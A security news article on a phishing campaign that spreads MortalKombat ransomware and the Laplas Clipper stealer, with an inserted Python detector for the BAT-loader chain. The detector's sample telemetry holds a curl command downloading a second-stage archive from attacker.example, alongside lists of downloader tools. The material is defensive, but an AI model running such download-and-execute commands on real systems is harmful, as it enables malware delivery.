Crypto-Stealing Campaign Deploys MortalKombat Ransomware

A new financial fraud campaign has been spotted using variants of the Xorist commodity ransomware “MortalKombat” and the Laplas Clipper malware.

The cyberattacks aim to steal cryptocurrency from victims and reportedly target victims primarily in the United States, but also in the United Kingdom, Turkey, and the Philippines.

“Leveraging cryptocurrencies offers threat actors compelling advantages such as anonymity, decentralization and lack of regulation, making them more difficult to track,” Cisco Talos wrote in a Tuesday advisory.

The company says it discovered an attacker scanning the Internet for victim machines with exposed Remote Desktop Protocol (RDP) ports. The attacker then used one of its download servers to run an RDP crawler to facilitate deployment of the MortalKombat ransomware.

From a technical standpoint, the attacks seen as part of this campaign start with a phishing email. The email initiates a multi-stage attack chain in which the actors deliver either the malware or the ransomware and then remove evidence of their malicious presence from infected machines.

“The malicious ZIP file attached to the initial phishing email contained a BAT loader script,” the advisory said.

When the victim executes the loader script, another malicious ZIP file is downloaded from the attacker-controlled hosting server to the victim’s machine and automatically unpacked, and the payload it contains (the Laplas Clipper malware or the GO variant of the MortalKombat ransomware) is executed.

“The loader script runs the dropped payload as a process on the victim’s machine, removing the downloaded and dropped malicious files and cleaning up infection markers,” writes Cisco Talos.
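As an added illustration, not code from the Talos advisory or this article, the following Python sketch looks for the loader sequence described above (a batch script run from a user-writable path, a second-stage archive download, a dropped executable starting, and clean-up of the staged files) in constructed Sysmon-style telemetry; the event format, host names, paths and URL are invented for the example.

```python
from collections import defaultdict

# Constructed sample telemetry (timestamp, host, event_type, detail), modelled
# loosely on Sysmon process-creation and file-delete events. Not real data.
EVENTS = [
    (1, "wks01", "process", r"C:\Windows\System32\cmd.exe /c C:\Users\a\AppData\Local\Temp\invoice\order.bat"),
    (2, "wks01", "process", r"C:\Windows\System32\curl.exe -o C:\Users\a\AppData\Local\Temp\stage2.zip http://attacker.example/stage2.zip"),
    (3, "wks01", "process", r"C:\Users\a\AppData\Local\Temp\stage2\payload.exe"),
    (4, "wks01", "file_delete", r"C:\Users\a\AppData\Local\Temp\stage2.zip"),
    (5, "wks01", "file_delete", r"C:\Users\a\AppData\Local\Temp\invoice\order.bat"),
    (1, "wks02", "process", r"C:\Windows\System32\cmd.exe /c C:\build\run_tests.bat"),
    (2, "wks02", "file_delete", r"C:\build\tmp.log"),
]

USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\")
SCRIPT_HOSTS = ("cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe")
DOWNLOADERS = ("curl.exe", "certutil.exe", "bitsadmin.exe", "powershell.exe")


def _user_writable(path):
    return any(marker in path for marker in USER_WRITABLE)


def detect_loader_chain(events):
    """Return {host: [timestamps]} for each host whose events show, in order:
    script host runs a .bat from a user-writable path -> downloader fetches a
    .zip -> executable starts from a user-writable path -> staged file deleted."""
    by_host = defaultdict(list)
    for event in sorted(events):
        by_host[event[1]].append(event)
    hits = {}
    for host, host_events in by_host.items():
        stage, staged, matched = 0, set(), []
        for ts, _, kind, detail in host_events:
            d = detail.lower()
            if stage == 0 and kind == "process" and ".bat" in d \
                    and any(h in d for h in SCRIPT_HOSTS) and _user_writable(d):
                staged.add(d.split()[-1])          # remember the loader script path
            elif stage == 1 and kind == "process" and ".zip" in d \
                    and any(t in d for t in DOWNLOADERS):
                staged.update(t for t in d.split()  # remember the second-stage archive
                              if t.endswith(".zip") and not t.startswith("http"))
            elif stage == 2 and kind == "process" and d.endswith(".exe") and _user_writable(d):
                pass                               # dropped payload executed
            elif stage == 3 and kind == "file_delete" and d in staged:
                matched.append(ts)
                hits[host] = matched               # full chain observed: clean-up seen
                break
            else:
                continue
            matched.append(ts)
            stage += 1
    return hits
```

Run stand-alone, `detect_loader_chain(EVENTS)` reports only `wks01`; the benign build host never reaches the first stage because its batch file lives outside a user-writable path.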

To defend against this campaign, Cisco Talos urged businesses to exercise caution when trading cryptocurrencies.

KnowBe4 security awareness advocate Erich Kron endorsed Cisco Talos’s security recommendations, adding that organizations should focus on email phishing defenses.

“While many organizations still allow .ZIP files as attachments, there may be no reason why most employees can send this type of file,” he said. “These types of archive files are regularly used when attempting to spread malware, so disallowing them could significantly improve our ability to defend against these campaigns.”

Phishing-based attacks were also at the center of a recent report from Cofense, which suggested that the use of Telegram bots as a source of phished information grew 800% between 2021 and 2022.
